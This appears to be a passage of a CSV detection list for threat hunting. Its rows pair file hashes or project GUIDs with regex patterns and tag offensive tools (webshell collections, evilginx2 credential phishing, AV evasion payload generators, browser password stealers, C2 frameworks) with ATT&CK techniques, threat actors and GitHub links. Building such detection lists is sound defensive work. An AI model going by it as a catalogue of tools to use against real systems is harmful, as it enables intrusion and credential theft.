"*e07330a2c8c8678fce26c761437a3ed5cf38881baea403a376a5b3b9b5ef9d27*",".{0,1000}e07330a2c8c8678fce26c761437a3ed5cf38881baea403a376a5b3b9b5ef9d27.{0,1000}","offensive_tool_keyword","ACEshark","uncover potential privilege escalation vectors by analyzing windows service configurations and Access Control Entries","T1058 - T1548","TA0004","N/A","N/A","Privilege Escalation","https://github.com/t3l3machus/ACEshark","1","0","#filehash","N/A","6","2","109","19","2025-01-15T07:01:48Z","2024-12-28T10:42:29Z","41755"
"*e0745223bdd96223cc512234545e517028d410e462bfa265f4c09b8e3740a44a*",".{0,1000}e0745223bdd96223cc512234545e517028d410e462bfa265f4c09b8e3740a44a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","41756"
"*e075c5a3c998e450c06b2e27ac2904ac2377b6d724577c5071437b68d6b3238b*",".{0,1000}e075c5a3c998e450c06b2e27ac2904ac2377b6d724577c5071437b68d6b3238b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","41757"
"*e07eba4d775523eedeb78938ddad86e13e409ce0d15c235e81a02f5bbb0124d7*",".{0,1000}e07eba4d775523eedeb78938ddad86e13e409ce0d15c235e81a02f5bbb0124d7.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","41759"
"*e080a9a96cea5b322687be0113ce158715ba988532e3800d37a8690767c0d22e*",".{0,1000}e080a9a96cea5b322687be0113ce158715ba988532e3800d37a8690767c0d22e.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","41760"
"*e0813810d26e45cd005e675ec628615fa9b6ba8b3c55ce002a74a8ebe143d133*",".{0,1000}e0813810d26e45cd005e675ec628615fa9b6ba8b3c55ce002a74a8ebe143d133.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","41761"
"*e084636dbb198247674ec5cf50646a01ff95b16ed6cf81c5a841062d14657a7e*",".{0,1000}e084636dbb198247674ec5cf50646a01ff95b16ed6cf81c5a841062d14657a7e.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","41762"
"*E08BAA9C-9D20-4C9A-8933-EC567F39F54C*",".{0,1000}E08BAA9C\-9D20\-4C9A\-8933\-EC567F39F54C.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#GUIDproject","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","41764"
"*e090e512d904f56de3f88655cd846ef48fb4d6ed5fedd1f452225c1917f5e352*",".{0,1000}e090e512d904f56de3f88655cd846ef48fb4d6ed5fedd1f452225c1917f5e352.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","#filehash","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","41765"
"*e094dc2a9ec5fe9800948a640f416fe610fdf155874e897d3cba6cc86f854083*",".{0,1000}e094dc2a9ec5fe9800948a640f416fe610fdf155874e897d3cba6cc86f854083.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","41766"
"*E09F4899-D8B3-4282-9E3A-B20EE9A3D463*",".{0,1000}E09F4899\-D8B3\-4282\-9E3A\-B20EE9A3D463.{0,1000}","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","0","#GUIDproject","N/A","8","2","145","29","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z","41768"
"*e0b25ed05fbe4558e26b270038d41c1de91ecde35d03520a2f20aaab7eee37e3*",".{0,1000}e0b25ed05fbe4558e26b270038d41c1de91ecde35d03520a2f20aaab7eee37e3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","41770"
"*e0bca03ae086a2ada8a29930036efe3ba12961a2ee71f2ec72cf9bd57096f604*",".{0,1000}e0bca03ae086a2ada8a29930036efe3ba12961a2ee71f2ec72cf9bd57096f604.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","41773"
"*e0bd65efa57344f0651829271be0eb5187290fcd27004c5ed95081009db434eb*",".{0,1000}e0bd65efa57344f0651829271be0eb5187290fcd27004c5ed95081009db434eb.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","41774"
"*e0c11846a94a3d0f93fa381c38677902b6727bc150944b643c52b51f171787fb*",".{0,1000}e0c11846a94a3d0f93fa381c38677902b6727bc150944b643c52b51f171787fb.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP -  C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#filehash","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","41776"
"*e0c20aa0ef6e4fd5cd5cabde2f89d64d4fe1c73d13cc1ed58e401bf5e0667754*",".{0,1000}e0c20aa0ef6e4fd5cd5cabde2f89d64d4fe1c73d13cc1ed58e401bf5e0667754.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","41777"
"*e0c9c27432a110f23a520ee1dad769a42f933062041df41cf88597fce97df008*",".{0,1000}e0c9c27432a110f23a520ee1dad769a42f933062041df41cf88597fce97df008.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","41778"
"*e0cc8936e11dcf4e016ff32f5a81aa15f352cb71ec8a24b383dc263e56425018*",".{0,1000}e0cc8936e11dcf4e016ff32f5a81aa15f352cb71ec8a24b383dc263e56425018.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","41779"
"*e0cfde420c63408cdb09819c3d98d0e96356ebdab6389d08fe695846d51b3f9b*",".{0,1000}e0cfde420c63408cdb09819c3d98d0e96356ebdab6389d08fe695846d51b3f9b.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","41780"
"*e0d5171c6951b726230f5f811f202c3a15b3fff10aa44547821e29d3b13cc140*",".{0,1000}e0d5171c6951b726230f5f811f202c3a15b3fff10aa44547821e29d3b13cc140.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","41781"
"*e0dc49ab46ab388ae93213602843e135bae218d15f17fc74bdc56de38fe5d6cc*",".{0,1000}e0dc49ab46ab388ae93213602843e135bae218d15f17fc74bdc56de38fe5d6cc.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","41784"
"*e0deeac091f3f0ed861e2c11d65fdb8e064bee75fd6867ef40b266e8f5c12f86*",".{0,1000}e0deeac091f3f0ed861e2c11d65fdb8e064bee75fd6867ef40b266e8f5c12f86.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","41786"
"*e0df786633e47059eb4200a1b521acb4b496006fca3c5d511978a71df6a8d976*",".{0,1000}e0df786633e47059eb4200a1b521acb4b496006fca3c5d511978a71df6a8d976.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","N/A","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","41787"
"*e0e4200ebb8381797450c5f7da031a1c389c31c3351370daa1b53c715ea07097*",".{0,1000}e0e4200ebb8381797450c5f7da031a1c389c31c3351370daa1b53c715ea07097.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","41788"
"*e0e5c3370cdbc6fbe0531ffc55979217b24d4f0eaf18ed7567c4ffc6baf8845a*",".{0,1000}e0e5c3370cdbc6fbe0531ffc55979217b24d4f0eaf18ed7567c4ffc6baf8845a.{0,1000}","offensive_tool_keyword","Rust-Malware-Samples","open source informations stealer in rust","T1003 - T1083 - T1114 - T1074","TA0006 - TA0009 - TA0005","N/A","N/A","Credential Access","https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/Malware-Samples","1","0","#filehash","N/A","10","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","41789"
"*e0f7ac87107e30818d287964478bfef438a388682656a428099abeda00375f1a*",".{0,1000}e0f7ac87107e30818d287964478bfef438a388682656a428099abeda00375f1a.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","41792"
"*e104cbadc6c2d170ca642537aca707b86a7947df0c619b08b9d35d3c13c0e079*",".{0,1000}e104cbadc6c2d170ca642537aca707b86a7947df0c619b08b9d35d3c13c0e079.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","41794"
"*e114380d61281bb9bffe5246d366342cecc6dfa22814b308fa08b075e0b0f35f*",".{0,1000}e114380d61281bb9bffe5246d366342cecc6dfa22814b308fa08b075e0b0f35f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","41797"
"*e11a3ad89cc8150c1ce7367b3360c717c6b39feb61986a37385af368df2083f9*",".{0,1000}e11a3ad89cc8150c1ce7367b3360c717c6b39feb61986a37385af368df2083f9.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","41799"
"*e11cbe43-b8bc-4042-a4a5-c8e960925c83*",".{0,1000}e11cbe43\-b8bc\-4042\-a4a5\-c8e960925c83.{0,1000}","offensive_tool_keyword","shutter","The goal of Shutter is to manage windows network stack communication via Windows Filtering Platform. Management can include blocking or permiting traffic based on IP or an executable that initiates or receives the traffic.","T1562 - T1027","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/dsnezhkov/shutter","1","0","#GUIDproject","N/A","10","2","116","15","2021-05-12T19:05:14Z","2021-05-12T18:51:03Z","41802"
"*E11DC25D-E96D-495D-8968-1BA09C95B673*",".{0,1000}E11DC25D\-E96D\-495D\-8968\-1BA09C95B673.{0,1000}","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/klezVirus/SilentMoonwalk","1","0","#GUIDproject","N/A","9","8","760","100","2024-07-20T10:41:31Z","2022-12-04T13:30:33Z","41803"
"*e11e118210b052c7d9ae1b8befde3254a6bf05ea82b8cca25d374aee39f064c4*",".{0,1000}e11e118210b052c7d9ae1b8befde3254a6bf05ea82b8cca25d374aee39f064c4.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in  to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","#filehash","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","41804"
"*e11e7c233271f76602b77312864c18c2daf0b4b86fd71422234776cb0b0ad04c*",".{0,1000}e11e7c233271f76602b77312864c18c2daf0b4b86fd71422234776cb0b0ad04c.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in  to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","#filehash","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","41806"
"*e11e7db705a11f8ca250d8d6826371e550b3214757f5bb9b648c7b0fad09294b*",".{0,1000}e11e7db705a11f8ca250d8d6826371e550b3214757f5bb9b648c7b0fad09294b.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","41807"
"*e127778b3688b8d058d5043af5c65d12fc280c37f303db140a6535974d1ae554*",".{0,1000}e127778b3688b8d058d5043af5c65d12fc280c37f303db140a6535974d1ae554.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","41809"
"*e12a9da86cf1e978789039ac79e8962af396dfe9c71db1aba39caed38a7f366e*",".{0,1000}e12a9da86cf1e978789039ac79e8962af396dfe9c71db1aba39caed38a7f366e.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","41810"
"*e12b5b70989233ee34a1984b959ac4e42a282148cc0f6f8a5434f2a1502e3fdd*",".{0,1000}e12b5b70989233ee34a1984b959ac4e42a282148cc0f6f8a5434f2a1502e3fdd.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","41811"
"*e13e6e6152026be625cf8af27fa44e767f83afd8aa0d0db0f7041075a8b647e7*",".{0,1000}e13e6e6152026be625cf8af27fa44e767f83afd8aa0d0db0f7041075a8b647e7.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","41813"
"*e14014dee6af3c42ae29dfc7eb3eb03790020c3c28aa5262fffe4a3b93a6df0f*",".{0,1000}e14014dee6af3c42ae29dfc7eb3eb03790020c3c28aa5262fffe4a3b93a6df0f.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","41814"
"*e1442c45400be7b8c2259e67c8df86c687583240414d8c1c085b69ff3493acc7*",".{0,1000}e1442c45400be7b8c2259e67c8df86c687583240414d8c1c085b69ff3493acc7.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","41816"
"*e145a82842b920b4079c118dc86a28e268876701ac743a9b234472375037bf1d*",".{0,1000}e145a82842b920b4079c118dc86a28e268876701ac743a9b234472375037bf1d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","41817"
"*e15a5f2c86a2ab9c3276c3344960b6ee9c122645b0dd634c78d0617a47d6e0d8*",".{0,1000}e15a5f2c86a2ab9c3276c3344960b6ee9c122645b0dd634c78d0617a47d6e0d8.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","41818"
"*e15ab99b615fc244af70a7d6bd7e834f0851ca1da63c4f17043c80f931cc0d8a*",".{0,1000}e15ab99b615fc244af70a7d6bd7e834f0851ca1da63c4f17043c80f931cc0d8a.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","#filehash","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","41819"
"*e15d7d10350005b94320906a3f324b1d054509cd3d0795921157daf0cee11e9a*",".{0,1000}e15d7d10350005b94320906a3f324b1d054509cd3d0795921157daf0cee11e9a.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","41820"
"*e1641d2918f41349e233feffd77b4f5088e4bc250d30a7be67693f3a09025088*",".{0,1000}e1641d2918f41349e233feffd77b4f5088e4bc250d30a7be67693f3a09025088.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","41822"
"*e1792577b8a2878c0ee0e02c94c3113ed483e99e4d20d716f1c4c7589076f06b*",".{0,1000}e1792577b8a2878c0ee0e02c94c3113ed483e99e4d20d716f1c4c7589076f06b.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","41826"
"*e17b62d1052bbed122fd65f701fe79600dc84b9dc9d4cd1e17c1dca2cc2c2e71*",".{0,1000}e17b62d1052bbed122fd65f701fe79600dc84b9dc9d4cd1e17c1dca2cc2c2e71.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - 